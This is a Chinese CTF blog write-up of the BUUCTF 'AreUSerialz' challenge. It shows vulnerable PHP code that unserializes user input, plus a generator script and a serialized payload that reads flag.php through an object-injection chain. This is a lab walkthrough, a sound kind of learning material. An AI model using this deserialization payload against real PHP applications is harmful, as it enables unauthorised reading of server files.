BUUCTF [网鼎杯 2020 青龙组]AreUSerialz1

已于 2023-08-21 10:56:53 修改
阅读量358 收藏 1
点赞数
文章标签: php 网络安全 web安全
于 2023-08-20 10:38:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74410605/article/details/132389322
版权

源码及解释如下代码

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();//表示接着要去访问process函数
    }

    public function process() {
        if($this->op == "1") {
            $this->write();//如果op=1,访问write函数
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);//如果op=2,访问read函数并且输出
        } else {
            $this->output("Bad Hacker!");//否则,输出bad hacker
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");//如果filename及content不为空且content里字符串长度>100输出Too long
                die();//接着结束进程,触发__destruct()函数
            }
            $res = file_put_contents($this->filename, $this->content);//将content里的内容写入filename中
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);//如果filename不为空,获取filename路径(暗示如果filename输入为flag.php,我们就能获取flag.php里的内容)
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//注意有个!非
            return false;
    return true;//形参变量i在ASCII码里为32-125则返回真
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {//调用is_valid函数判断是否满足在32-125范围
        $obj = unserialize($str);
    }

}

通过认真看代码及理解代码,根据op=2且filename=flag.php写出相应的反序列化代码构造payload即可得出flag。

<?php
highlight_file(__FILE__);
	class FileHandler {
        protected $op = 2;
        protected $filename = "flag.php";
        protected $content;
    }
    $a = new FileHandler();
    $b = serialize($a);
    echo $b
?>

但是发现这样会得到一些乱码

这是因为 protected/private类型的属性序列化后会产生不可打印字符,换成public类型就不会

<?php
highlight_file(__FILE__);
	class FileHandler {
        public $op = 2;
        public $filename = "flag.php";
        public $content;
    }
    $a = new FileHandler();
    $b = serialize($a);
    echo $b
?>

得到O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

构造?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

接着ctrl+u查看源码即可得到flag

咕噜yay
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
[网鼎杯 2020 青龙]AreUSerialz1
陈艺秋的博客
07-05 693
如果 $str 经过 is_valid() 函数的检查,返回 true,则使用 unserialize() 函数对 $str 进行反序列化操作,并将结果赋值给变量 $obj。op,filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验。则将 $op 的值修改为 "1",并清空 $content,然后再次调用 process() 方法。
BUUCTF [网鼎杯 2020 青龙] AreUSerialz1
最新发布
m0_74167420的博客
06-19 211
(2)对于FileHandler类,由于在反序列化中,先调用__destruct()析构方法,所以需要设计op的值绕过与 "2" 的强相等。(3)所以当op = 2时,一方面利用弱相等,可以调用read()方法和output()方法,另一方面也可以绕过强相等,避免执行在__destruct()时 op 赋值为 1。(1)get传参 "str",string转化为字符串,用 is_valid() 函数来进行过滤,要求传入的字符串的每一位字符的ASCII码都在32~125之间。1、阅读题目:php绕过类型。
[网鼎杯 2020 青龙]AreUSerialz 1
qq_43618536的博客
07-03 485
BUUCTF的[网鼎杯 2020 青龙]AreUSerialz 1
[网鼎杯 2020 青龙]AreUSerialz 1参考解析
weixin_52003758的博客
01-28 3057
进入题目,便是php的代码 这是一个代码审计题目(序列化和反序列化) 【注】在代码中我已经给出了部分的注释 <?php // 文件包含 include("flag.php"); highlight_file(__FILE__); // 阐述FileHandler类 class FileHandler { protected $op; protected $filename; protected $content; // 构造函数,将op filename c
[网鼎杯 2020 青龙]AreUSerialz1详解两种常用方法及php伪协议扩展
m0_73615178的博客
01-21 612
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
2020网鼎杯青龙Boom
05-12
【标题】"2020网鼎杯青龙Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎。
20200510.网鼎杯青龙.zip
06-10
2020 5 10 网鼎杯 青龙 比赛题目 web没有附件 其他基本都有 , 感谢各位师傅的整理
BUUCTF [网鼎杯 2020 青龙]AreUSerialz 1 (两种解法 超详细!)
m0_73734159的博客
11-27 1694
*include() ** 包含函数 ** ****is_valid() ** 检查对象变量是否已经实例化,即实例变量的值是否是个有效的对象。**file_get_contents() ** 函数把整个文件读入一个字符串中。**file_put_contents() **函数把一个字符串写入文件中。
BUU实战笔记——[网鼎杯 2020 青龙]AreUSerialz1
qq_51175992的博客
07-14 132
方向很明确的PHP反序列化题,找到两个特征之后,再找对象、属性及属性的值就可以做出来啦!
CTF学习-WEB-PHP反序列化-[网鼎杯 2020 青龙]AreUSerialz 1
qq_43564182的博客
07-13 632
步骤思路 第一:获取flag存储flag.php 第二:两个魔术方法__destruct __construct 第三:传输str参数数据后触发destruct,存在is_valid过滤 第四:__destruct中会调用process,其中op=1写入及op=2读取 第五:涉及对象FileHandler,变量op及filename,content,进行构造输出** 解题 打开网页发现如下代码: <?php include("flag.php"); highlight_file(__FILE__
buuctf - [网鼎杯 2020 青龙]AreUSerialz
qq_40860153的博客
10-11 2571
1.题目源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content
2020网鼎杯青龙)--WEB--AreUSerialz(反序列化)
a965527596的博客
05-17 2331
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
序列化2之[网鼎杯 2020 青龙]AreUSerialz1
qq_58970968的博客
04-17 2244
class FileHandler { protected $op; protected $filename; protected $content; function __construct(){ $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hello World!"; $this->process(); } public .
反序列化 [网鼎杯 2020 青龙]AreUSerialz 1
m0_75178803的博客
11-06 228
protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00。if 语句中的判断语句用的是弱类型的比较,那么只要op=2,这个是int整数型的2, op == "2"则为True,就可以进入read函数。从__destruct()代码中可以看到,这里 if 中的判断语句用的是强类型比较。
允许外网访问青龙面板
10-10
要允许外网访问青龙面板,您需要进行以下操作: 1. 配置防火墙规则:确保服务器的防火墙允许外部访问面板的端口。默认情况下,青龙面板使用的是5700端口,您可以根据自己的需要进行配置。 2. 配置面板监听地址:打开青龙面板的配置文件 `config/auth.json`,将 `address` 字段的值修改为 `0.0.0.0`,表示监听所有可用的网络接口。 3. 配置登录验证:如果您希望对外网访问青龙面板进行登录验证,可以在 `config/auth.json` 文件中修改 `whitelist` 字段,添加允许访问的IP地址或IP段。 4. 重启青龙面板:保存配置文件后,重新启动青龙面板,使配置生效。 请注意,开放面板的外网访问涉及到网络安全风险,请确保您对服务器和青龙面板进行适当的安全防护和访问控制。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值